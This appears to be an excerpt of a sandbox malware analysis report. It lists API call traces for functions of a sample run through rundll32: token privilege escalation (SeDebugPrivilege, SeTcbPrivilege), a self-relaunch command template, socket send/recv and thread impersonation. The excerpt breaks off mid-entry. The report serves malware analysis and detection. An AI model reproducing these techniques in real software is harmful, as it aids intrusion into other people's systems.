                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04852E32
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852E3B
                                                                      • GetProcessHeap.KERNEL32(00000008,00000048,74DEF380), ref: 04852E4D
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852E50
                                                                      • htons.WS2_32(00000044), ref: 04852E68
                                                                      • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04852EF3
                                                                      • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04852F0B
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04852F31
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852F38
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852F43
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852F4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                      • String ID:
                                                                      • API String ID: 1780562090-0
                                                                      • Opcode ID: a82b06aac18c77a7c25be2cd9f4a3b8fb4f343381a44a8babacbccd44b9a5ef7
                                                                      • Instruction ID: 5e359ff39a463afa026b55bd97ef87c6db6356e1226a72a4de0c5ae73efd743a
                                                                      • Opcode Fuzzy Hash: a82b06aac18c77a7c25be2cd9f4a3b8fb4f343381a44a8babacbccd44b9a5ef7
                                                                      • Instruction Fuzzy Hash: 3E41C335640345FAEB109FA4D845BAA7BB8FF48310F108999FE09DF291EB78D845CB18
                                                                      Function 04857BF7 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69processstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04857C0E
                                                                      • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04857C28
                                                                      • GetModuleFileNameW.KERNEL32(04867BC8,0000030C), ref: 04857C43
                                                                      • PathFindFileNameW.SHLWAPI(04867BC8,?), ref: 04857C51
                                                                      • wsprintfW.USER32 ref: 04857C6B
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04857CB3
                                                                      • ExitProcess.KERNEL32 ref: 04857CBA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                                                      • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                      • API String ID: 3592876439-3730106045
                                                                      • Opcode ID: 4dd9b12436738fecec313bf18efc853b77d30be15d48f1e36923f070dd0aaa49
                                                                      • Instruction ID: 9dbd1c65de603d2ea1675568f373508d9e6281c093ff4523a2026faee2c8adba
                                                                      • Opcode Fuzzy Hash: 4dd9b12436738fecec313bf18efc853b77d30be15d48f1e36923f070dd0aaa49
                                                                      • Instruction Fuzzy Hash: F7116AB2500219AFEB119BA4DD48EEB77BCEF04305F048A66F906D6151DA38EE448F64
                                                                      Function 048569AE Relevance: 12.6, APIs: 10, Instructions: 97memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,75B0B010,00000000,00000000), ref: 048569E3
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048569EC
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856A19
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04856A3D
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04856A40
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856A6F
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04856A8F
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856A92
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 04856A99
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856A9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 3405790324-0
                                                                      • Opcode ID: e19e6eb500c2596f0ffa2053a0db4a371982190dcc5d38eeb1aa5b44d2cac80d
                                                                      • Instruction ID: cca1fd891f344f09ea4e301dc216e9ec827dd020eb861c651b469f5cc59f857c
                                                                      • Opcode Fuzzy Hash: e19e6eb500c2596f0ffa2053a0db4a371982190dcc5d38eeb1aa5b44d2cac80d
                                                                      • Instruction Fuzzy Hash: 8A31817590010AAFDB15AFA8CC45EAABBB9EF44344F058951ED08DB261E674F614CB90
                                                                      Function 048568B5 Relevance: 12.6, APIs: 10, Instructions: 96memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000), ref: 048568EB
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048568F4
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856921
                                                                      • GetProcessHeap.KERNEL32(00000008,?,74DEE010), ref: 04856946
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04856949
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856978
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04856995
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856998
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0485699F
                                                                      • HeapFree.KERNEL32(00000000), ref: 048569A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 3405790324-0
                                                                      • Opcode ID: 0e8c2f3526978778d6da192a2211327fa181bedc67accab00aaf8f04a7931d8e
                                                                      • Instruction ID: 7c564073bb85cbb6285730bed559b821b2fa98b433a06ae1d61a7c08fed05cad
                                                                      • Opcode Fuzzy Hash: 0e8c2f3526978778d6da192a2211327fa181bedc67accab00aaf8f04a7931d8e
                                                                      • Instruction Fuzzy Hash: EE315E7590010AAFDB14EFA8CC45EAFBBB8EF48354F058955ED08DB261E674EA14CB90
                                                                      Function 048540E3 Relevance: 12.6, APIs: 10, Instructions: 91memorysleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540F8
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540FB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 04854148
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 0485414B
                                                                      • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?,00000000), ref: 04854184
                                                                      • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,0485423E,?,?,?,0485423D,?,?,?,?,00000000), ref: 048541BC
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?), ref: 048541CB
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541CE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541D7
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreeSleep
                                                                      • String ID:
                                                                      • API String ID: 1437939644-0
                                                                      • Opcode ID: 8063a9faf52ec61bcbef540681215b10a971d62859a5c5a4e030d1c6fef57322
                                                                      • Instruction ID: ea1070b254a87fb6257d52a0991328aac523aee61a2c3f53d7a99af918f54e68
                                                                      • Opcode Fuzzy Hash: 8063a9faf52ec61bcbef540681215b10a971d62859a5c5a4e030d1c6fef57322
                                                                      • Instruction Fuzzy Hash: 2131B074440305ABDB20AF65D808B6BBFF8FF49701F008909FD89DA2A0D778E885DB60
                                                                      Function 04857897 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 048578AF
                                                                      • srand.MSVCRT ref: 048578B2
                                                                      • GetTickCount.KERNEL32 ref: 048578B9
                                                                        • Part of subcall function 04857CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,048579E8), ref: 04857CE9
                                                                        • Part of subcall function 04857CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,048579E8), ref: 04857CF0
                                                                        • Part of subcall function 04857CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04857D02
                                                                        • Part of subcall function 04857CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04857D25
                                                                        • Part of subcall function 04857CC5: GetLastError.KERNEL32(?,00000000), ref: 04857D2D
                                                                        • Part of subcall function 04857CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,048579E8), ref: 04857D3F
                                                                      • GetModuleFileNameW.KERNEL32(04867BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04857926
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                                                      • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                                      • API String ID: 1536163209-50072501
                                                                      • Opcode ID: 29efa9ff2ba4c498afb83a6f5ade7a662b640bd321ec25dce963720c91d44c62
                                                                      • Instruction ID: a7c49654243a3f50e5a3174e01ee04105674d188c31f737d47fa53a8fe9ace81
                                                                      • Opcode Fuzzy Hash: 29efa9ff2ba4c498afb83a6f5ade7a662b640bd321ec25dce963720c91d44c62
                                                                      • Instruction Fuzzy Hash: 11011271D50310DBE750BB7A9809A4A7EADEB04698F049E55ED11D2154DBBCEC00DBE1
                                                                      Function 04854F43 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 82memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000068,74DEF380,?,76ED5E70,?,048551F9,?,?,?), ref: 04854F56
                                                                      • HeapAlloc.KERNEL32(00000000,?,048551F9,?,?,?), ref: 04854F5D
                                                                      • rand.MSVCRT ref: 04854F86
                                                                      • GetProcessHeap.KERNEL32(00000008,?,048551F9,?,00000000,?,048551F9,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04854FF7
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854FFE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,048551F9,?,?,?), ref: 04855007
                                                                      • HeapFree.KERNEL32(00000000,?,048551F9,?,?,?), ref: 0485500E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$Allocrand
                                                                      • String ID: p
                                                                      • API String ID: 2875874559-2181537457
                                                                      • Opcode ID: a71d642a35521a2a003d14947416d4f088b183ad54b6958acf30b4f1cd086646
                                                                      • Instruction ID: 79b42f4ad5e451dde79fdaa8cb7177dacf784b12b8617ff76c442718524f62e9
                                                                      • Opcode Fuzzy Hash: a71d642a35521a2a003d14947416d4f088b183ad54b6958acf30b4f1cd086646
                                                                      • Instruction Fuzzy Hash: F721E535500344BBEF11AFA89C88FAE7FB9EF45301F008545FD009B151C779A849DB61
                                                                      Function 04858832 Relevance: 12.1, APIs: 8, Instructions: 62memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(04867BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0485884F
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 04858860
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0485886F
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04858876
                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0485888F
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 048588A0
                                                                      • HeapFree.KERNEL32(00000000), ref: 048588A7
                                                                      • CloseHandle.KERNEL32(?), ref: 048588C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                      • String ID:
                                                                      • API String ID: 3250796435-0
                                                                      • Opcode ID: c8bfbd907bf73aee0cf3e4bbc7655b0bd920eaa20908a85901d87b8a42f4a3a1
                                                                      • Instruction ID: 93ed21af1470969136278d8e319b63d08698c15343da9c1d9e4723d39df88ba2
                                                                      • Opcode Fuzzy Hash: c8bfbd907bf73aee0cf3e4bbc7655b0bd920eaa20908a85901d87b8a42f4a3a1
                                                                      • Instruction Fuzzy Hash: CE114F70900204FBDB216FA5AC8CDAFBFBCEB85755F108A5AFC11E6150D378AD41EA60
                                                                      Function 048533A4 Relevance: 10.6, APIs: 7, Instructions: 66memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04853745,?,?,?,00000000,00000000,?,?,?,04854A6E), ref: 048533BB
                                                                      • HeapAlloc.KERNEL32(00000000,?,04853745,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?), ref: 048533C2
                                                                      • htons.WS2_32(?), ref: 048533E1
                                                                      • memcpy.MSVCRT(00000037,?,?,?,04853745,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?), ref: 04853410
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04853421
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04853434
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485343B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                      • String ID:
                                                                      • API String ID: 4260819906-0
                                                                      • Opcode ID: a1fc7ae7c653da533cb094db999d8a1c843db49749493366ef98f6da8eae045a
                                                                      • Instruction ID: 16193e5063b1140e9cdd0cde3e73fef76132db817cb8a199f530d4e91d1a389a
                                                                      • Opcode Fuzzy Hash: a1fc7ae7c653da533cb094db999d8a1c843db49749493366ef98f6da8eae045a
                                                                      • Instruction Fuzzy Hash: 62118BB6400249ABEB019FA8D889FAB7BACEF19311F048445FD00DA251D7BDE949C771
                                                                      Function 04853209 Relevance: 10.6, APIs: 7, Instructions: 65memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E), ref: 04853220
                                                                      • HeapAlloc.KERNEL32(00000000,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?), ref: 04853227
                                                                      • htons.WS2_32(?), ref: 04853246
                                                                      • memcpy.MSVCRT(0000004B,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?), ref: 04853276
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04853287
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0485329A
                                                                      • HeapFree.KERNEL32(00000000), ref: 048532A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                      • String ID:
                                                                      • API String ID: 4260819906-0
                                                                      • Opcode ID: 963d25e65e7a11b99c517b000b833aacb4728ce880f455e89241fb799b93b84e
                                                                      • Instruction ID: 6cd68b07990729d4dc4d9f48b023e673071cd32e8e6983d916bbb5b761801977
                                                                      • Opcode Fuzzy Hash: 963d25e65e7a11b99c517b000b833aacb4728ce880f455e89241fb799b93b84e
                                                                      • Instruction Fuzzy Hash: EB117976500249ABEB009FE8AC89FAB7FACEB49321F048545FD00DA292E779D945C760
                                                                      Function 04856BD1 Relevance: 10.1, APIs: 8, Instructions: 61memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C29
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C2C
                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C39
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C3C
                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C4E
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C51
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C56
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C59
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: 0e85939b3dd0d3bca5ec0cf1a63b9ca6466590d983a6a018c9821e00f7302124
                                                                      • Instruction ID: 994c749df0db582a0c4837787c425254da73d65a8a8146ecdc2eea34728e7d33
                                                                      • Opcode Fuzzy Hash: 0e85939b3dd0d3bca5ec0cf1a63b9ca6466590d983a6a018c9821e00f7302124
                                                                      • Instruction Fuzzy Hash: 33113731600308EFDB20EF96C980F2AB3F9EF55342F410958E809AB2A1DB74FD44CA60
                                                                      Function 0485652F Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04857A8E,?), ref: 04856566
                                                                      • StrToIntW.SHLWAPI(00000000,?,?,?,?,04857A8E,?), ref: 04856581
                                                                      • StrStrW.SHLWAPI(00000000,04861580,?,?,?,?,?,04857A8E,?), ref: 048565B3
                                                                      • StrStrW.SHLWAPI(00000000,04861588,?,?,?,?,?,04857A8E,?), ref: 048565CD
                                                                      • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04857A8E,?), ref: 048565DF
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,04857A8E,?), ref: 04856607
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ArgvCommandFreeLineLocal
                                                                      • String ID:
                                                                      • API String ID: 1203019955-0
                                                                      • Opcode ID: 4cf91380c9376bc72fa5b39c24e29eebafe50366790c28b9ef4aa10779496876
                                                                      • Instruction ID: b71300a808417e08998adce346565013f84e4018e631837b3c532d4f14f6ba07
                                                                      • Opcode Fuzzy Hash: 4cf91380c9376bc72fa5b39c24e29eebafe50366790c28b9ef4aa10779496876
                                                                      • Instruction Fuzzy Hash: D831F631500218EFDB219F28D9449ADBBACFF14755B408E65EC0AEB260F774FA80CB81
                                                                      Function 048598AB Relevance: 9.1, APIs: 6, Instructions: 76threadsynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 04856CED: GetProcessHeap.KERNEL32(00000008,00000008,00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856CFC
                                                                        • Part of subcall function 04856CED: HeapAlloc.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856CFF
                                                                        • Part of subcall function 04856CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856D24
                                                                        • Part of subcall function 04856CED: HeapFree.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856D27
                                                                      • CreateThread.KERNEL32(00000000,00000000,0485988B,?,00000004,00000000), ref: 048598FD
                                                                      • SetThreadToken.ADVAPI32(?,?,?,0485A15C,?,?), ref: 0485990F
                                                                      • ResumeThread.KERNEL32(?,?,0485A15C,?,?), ref: 0485991C
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,0485A15C,?,?), ref: 0485992C
                                                                      • GetLastError.KERNEL32(?,0485A15C,?,?), ref: 04859934
                                                                      • CloseHandle.KERNEL32(?,?,0485A15C,?,?), ref: 0485993D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
